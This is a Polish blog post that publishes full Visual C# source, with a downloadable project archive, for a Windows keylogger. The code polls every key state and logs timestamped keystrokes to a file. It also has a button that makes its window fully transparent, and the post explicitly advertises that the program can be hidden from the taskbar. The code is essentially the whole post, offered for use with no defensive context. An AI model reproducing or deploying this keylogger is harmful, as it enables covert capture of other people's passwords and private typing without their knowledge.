»

Lis 02

Wydrukuj to Wpis

Visual C# – Keylogger

Visual C# Keylogger

Keylogger – zapisuje każdy wciśnięty klawisz. Zapisuje datę oraz godzinę, o której wpisywany był tekst. Keylogger może zostać głęboko ukryty w systemie (niewidoczny na pasku zadań).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
namespace KeyLogger
{
  public partial class Form1 : Form
  {
    public Form1()
    {
      InitializeComponent();
    }
 
    [DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(System.Windows.Forms.Keys vKey);
 
    [DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(System.Int32 vKey);
 
 
    private void timer1_Tick(object sender, EventArgs e)
    {
      foreach (System.Int32 i in Enum.GetValues(typeof(Keys))) 
      {
        if (GetAsyncKeyState(i) == -32767)  
        {
           textBox1.AppendText(Enum.GetName(typeof(Keys), i));
           if (Control.ModifierKeys == (Keys.Alt | Keys.Control) && i == 122) this.Opacity = 1;
        }
      }
 
      if (textBox1.TextLength >= 1000) Log();
    }
 
    private void button1_Click(object sender, EventArgs e)
    {
      if (timer1.Enabled == false)
      {
        timer1.Enabled = true;
        button1.Text = "Zatrzymać";
        button2.Enabled = true;
      }
      else 
      {
        timer1.Enabled = false;
        button1.Text = "Uruchomić";
        button2.Enabled = false;
      }
    }
 
    private void button2_Click(object sender, EventArgs e)
    {
      this.Opacity = 0;
    }
 
    void Log()
    {
      try
      {
        StreamWriter writer = new StreamWriter("log.txt", true);//true - dodać log do już stworzonego pliku
        writer.WriteLine(DateTime.Now.ToString());
        writer.WriteLine(textBox1.Text.ToString());
        writer.Close();
        textBox1.Clear(); // wyczyścić textBox1
      }
      catch
      {
      }
 
    }
  }
}

Załączniki do pobrania

 • rar KeyLogger.rar
  Visual C# Project
  Rozmiar pliku: 49 KB Pobrania: 164

Permalink do tego artykułu: http://tmall.com.pl/visual-csharp-keylogger/

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

Możesz użyć tych znaczników i atrybutów HTMLa: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>